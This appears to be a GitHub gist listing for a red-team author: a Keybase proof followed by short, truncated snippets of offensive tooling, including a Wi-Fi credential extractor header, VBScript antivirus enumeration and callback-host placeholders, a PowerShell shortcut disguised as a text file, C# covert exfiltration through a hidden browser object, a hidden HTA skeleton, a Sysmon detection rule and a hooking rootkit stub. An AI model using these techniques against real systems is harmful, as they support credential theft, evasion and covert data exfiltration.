leoloobeek

Keybase proof

I hereby claim:

• I am leoloobeek on github.
• I am leoloobeek (https://keybase.io/leoloobeek) on keybase.
• I have a public key ASCyIsv1dP110VtA9CuMQ7YPLZ758Seyi8O5hu_ww7ZDVgo

To claim this, I am signing this object:

leoloobeek

  #====================================#
  # Extract Wi-Fi Credentials          #
  # greg . foss @ owasp . org          #
  # v0.1  --  July, 2017               #
  #====================================#
  
# Licensed under the MIT License

<#

leoloobeek

Function Base64Encode(sText)
  dim DM, EL
  Set DM = CreateObject("Microsoft.XMLDOM")
  Set EL = DM.createElement("tmp")
  EL.DataType = "bin.base64"
  EL.NodeTypedValue = sText
  Base64Encode = EL.Text
End Function
Set wmiObj=GetObject("winmgmts:{impersonationLevel=impersonate}\\.\ROOT\SecurityCenter2")
Set items = wmiObj.ExecQuery("Select * from AntiVirusProduct")

leoloobeek

Option Explicit 
 
dim oEncoder, oFilesToEncode, file, sDest 
dim sFileOut, oFile, oEncFile, oFSO, i 
dim oStream, sSourceFile 
 
set oFilesToEncode = WScript.Arguments 
set oEncoder = CreateObject("Scripting.Encoder") 
For i = 0 to oFilesToEncode.Count - 1 
    set oFSO = CreateObject("Scripting.FileSystemObject") 

leoloobeek

Call X()
End Function

Dim RHOST: RHOST = "x.x.x.x"
Dim RPORT: RPORT = "8999"

Function Base64ToStream(b)
  Dim enc, length, ba, transform, ms
  Set enc = CreateObject("System.Text.ASCIIEncoding")
  length = enc.GetByteCount_2(b)

leoloobeek

$Shell = New-Object -ComObject ("WScript.Shell")
$ShortCut = $Shell.CreateShortcut($env:USERPROFILE + "\Desktop\MaliciousLink.lnk")
$ShortCut.Arguments = " -W 1 -command ....."
$ShortCut.TargetPath = "powershell"
$ShortCut.IconLocation = "C:\Windows\System32\notepad.exe, 0";
$ShortCut.Description = "Type: Text Document";
$ShortCut.Save()

leoloobeek

// sample function that takes in a destination server, POST data, and custom HTTP request headers
private string SendData(string dst, byte[] postData, string customHeaders)
{
    Type com_type = Type.GetTypeFromCLSID(new Guid("0002DF01-0000-0000-C000-000000000046"));
    object IE = Activator.CreateInstance(com_type);

    object[] falseArr = new object[] { false };
    object[] trueArr = new object[] { true };
    com_type.InvokeMember("Visible", System.Reflection.BindingFlags.SetProperty, null, IE, falseArr);
    com_type.InvokeMember("Silent", System.Reflection.BindingFlags.SetProperty, null, IE, trueArr);

leoloobeek

<html>
<head>
<script language="JScript">
// HTA skeleton taken from https://github.com/zerosum0x0/koadic
window.resizeTo(1, 1);
window.moveTo(-2000, -2000);
window.blur();

try
{

leoloobeek

	<!--SYSMON EVENT ID 7 : DLL (IMAGE) LOADED BY PROCESS-->
		<!--DATA: UtcTime, ProcessGuid, ProcessId, Image, ImageLoaded, Hashes, Signed, Signature, SignatureStatus-->
		<ImageLoad onmatch="include">
			<ImageLoaded condition="end with">ieproxy.dll</ImageLoaded>
		</ImageLoad>
		<ImageLoad onmatch="exclude">
			<Image condition="is">C:\Program Files (x86)\Internet Explorer\iexplore.exe</Image>
			<Image condition="is">C:\Program Files\internet explorer\iexplore.exe</Image>
			<Image condition="is">C:\Program Files (x86)\Internet Explorer\ielowutil.exe</Image>
			<Image condition="is">C:\Program Files\internet explorer\ielowutil.exe</Image>

leoloobeek

#include <windows.h>
#include <stdio.h>


FARPROC fpCreateProcessW;
BYTE bSavedByte;

// Blog Post Here:
// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
// tasklist | findstr explore.exe